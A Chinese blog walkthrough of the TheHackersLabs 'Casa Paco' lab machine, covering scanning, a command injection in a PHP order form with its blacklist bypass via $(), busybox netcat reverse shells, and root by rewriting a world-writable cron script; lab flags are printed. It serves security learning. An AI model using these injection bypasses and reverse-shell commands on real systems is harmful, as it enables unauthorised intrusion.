Pepster'Blog
TheHackersLabs-Casa Paco靶机详解WP
城南花已开 Lv5
  2025-01-15 10:54:53   2025-01-22 19:49:12    1.6k 字  9 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.152  08:00:27:91:ed:24       (Unknown)
192.168.60.254  00:50:56:f0:df:73       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.971 seconds (129.88 hosts/sec). 4 responded
export ip=192.168.60.152
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.152:22
Open 192.168.60.152:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-15 10:55 CST
Initiating ARP Ping Scan at 10:55
Scanning 192.168.60.152 [1 port]
Completed ARP Ping Scan at 10:55, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:55
Completed Parallel DNS resolution of 1 host. at 10:55, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:55
Scanning 192.168.60.152 [2 ports]
Discovered open port 22/tcp on 192.168.60.152
Discovered open port 80/tcp on 192.168.60.152
Completed SYN Stealth Scan at 10:55, 0.07s elapsed (2 total ports)
Nmap scan report for 192.168.60.152
Host is up, received arp-response (0.00056s latency).
Scanned at 2025-01-15 10:55:18 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:91:ED:24 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

访问80端口,发现是个域名,加一个hosts

1
2
❯ sudo vim /etc/hosts
192.168.60.152 casapaco.thl

image

命令注入

发现有个点餐的页面存在命令注入的漏洞

image

可以执行任意命令,但你有分号就不行,会提示不要hackme🤣

我猜测了好多,尝试拼接命令

好在最后可以通过$()绕过,虽然两个反引号也可以执行命令,但是不能绕过,可能文件里面写死了过滤

image

尝试cat一下这个处理的文件,但是好像源文件不能显示完全,只能看部分的,可能这部分会被php解析

image

不对,文件看错了,不带1的php才是处理的脚本

发现echo也能进行绕过

1
2
echo -n 'cat /etc/passwd' |base64
Y2F0IC9ldGMvcGFzc3dk

拿到一个用户pacogerente

image

那既然知道$()可以绕过,尝试反弹一个shell吧

结果靶机上nc也没有,wget也没有那这怎么弹

不过有busybox,那直接利用一下

image

www-date提权

busybox nc 192.168.60.100 4444 -e s$()h拿到shell

看一下处理的流程,果然有黑名单,还有白名单,只有白名单里面的才能执行,$()正好包含在白名单中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
(remote) www-data@Thehackerslabs-CasaPaco:/var/www/html$ cat llevar.php
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Casa Paco - Para Llevar</title>
    <link rel="stylesheet" href="static/styles.css">
</head>
<body>
    <header>
        <h1>Casa Paco - Pedido para Llevar</h1>
    </header>

    <main>
        <h2>Haz tu pedido para llevar</h2>
        <form action="llevar.php" method="POST" class="order-form">
            <label for="name">Nombre:</label>
            <input type="text" id="name" name="name" placeholder="Tu nombre" required><br>
            <label for="dish">Plato:</label>
            <input type="text" id="dish" name="dish" placeholder="Ejemplo: Cocido" required><br>
            <button type="submit" class="btn">Enviar Pedido</button>
        </form>

        <?php
        if ($_SERVER["REQUEST_METHOD"] === "POST") {
            $name = htmlspecialchars($_POST["name"]);
            $dish = $_POST["dish"];

            // Filtro para bloquear comandos simples
            $pattern_blacklist = '/\b(whoami|ls|pwd|cat|sh|bash)\b/i';
            if (preg_match($pattern_blacklist, $dish)) {
                die('<p style="color: red;">Error: Pide comida no intentes hackearme. Los callos estan muy ricos.</p>');
            }

            // Permitir solo caracteres y estructuras de comandos más complejas
            $allowed_pattern = '/^[a-zA-Z0-9\s\$\(\)\-\_\.\|]*$/';
            if (!preg_match($allowed_pattern, $dish)) {
                die('<p style="color: red;">Error: Pide comida no intentes hackearme. Los callos estan muy ricos.</p>');
            }

            // Comando vulnerable
            $output = shell_exec("$dish");

            echo '<section class="confirmation">';
            echo '<h3>Pedido confirmado</h3>';
            echo "<p>Gracias, <strong>$name</strong>. Tu pedido de <strong>$dish</strong> estará listo para llevar.</p>";
            echo '<h3>Salida del Comando:</h3>';
            echo "<pre>$output</pre>";
            echo '</section>';
        }
        ?>
    </main>

    <footer>
        <p>&copy; 2025 Casa Paco. Todos los derechos reservados.</p>
    </footer>
</body>
</html>
(remote) www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ cat user.txt
e9745364e54d369f049d735678e5c57a

Root提权

没想到有权限可以直接读user

然后看到用户家目录有个脚本,权限为766,猜测root会定期执行此脚本

传个pspy上去监控进程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
(remote) www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ ls -al
total 44
drwxr-xr-x 3 pacogerente pacogerente  4096 Jan 14 17:08 .
drwxr-xr-x 3 root        root         4096 Jan 14 16:52 ..
lrwxrwxrwx 1 root        root            9 Jan 14 16:58 .bash_history -> /dev/null
-rw-r--r-- 1 pacogerente pacogerente   220 Mar 29  2024 .bash_logout
-rw-r--r-- 1 pacogerente pacogerente  3526 Mar 29  2024 .bashrc
drwxr-xr-x 3 pacogerente pacogerente  4096 Jan 13 20:24 .local
-rw-r--r-- 1 pacogerente pacogerente   807 Mar 29  2024 .profile
-rwxrw-rw- 1 pacogerente pacogerente   110 Jan 14 16:57 fabada.sh
-rw-r--r-- 1 root        root        11268 Jan 15 16:41 log.txt
-rw-r--r-- 1 pacogerente pacogerente    33 Jan 14 17:06 user.txt
(remote) www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ cd /tmp/
(remote) www-data@Thehackerslabs-CasaPaco:/tmp$ ./pspy64
2025/01/15 16:31:02 CMD: UID=0     PID=12897  | /usr/sbin/CRON -f
2025/01/15 16:31:02 CMD: UID=0     PID=12898  | /usr/sbin/CRON -f
2025/01/15 16:31:02 CMD: UID=0     PID=12899  | /bin/sh -c /home/pacogerente/fabada.sh
2025/01/15 16:31:02 CMD: UID=0     PID=12900  | /bin/bash /home/pacogerente/fabada.sh

果真如此

那直接改写脚本文件不就完事了

1
2
3
(remote) www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ echo "busybox nc 192.168.60.100 1234 -e sh">fabada.sh
(remote) www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ cat fabada.sh
busybox nc 192.168.60.100 1234 -e sh

监听端口即可

1
2
3
4
❯ pwncat-cs -lp 1234
(local) pwncat$
(remote) root@Thehackerslabs-CasaPaco:/root# cat /root/root.txt
452354bjb5434mn43b5j678e5c57a

结束了,不用提权用户,直接提到Root,还是比较简单的,卡就卡在前面在尝试命令注入绕过的时候,卡了一会

  1. 信息收集
    1. 服务探测
    2. 命令注入
  2. www-date提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 258.9k
  1. 信息收集
    1. 服务探测
    2. 命令注入
  2. www-date提权
  3. Root提权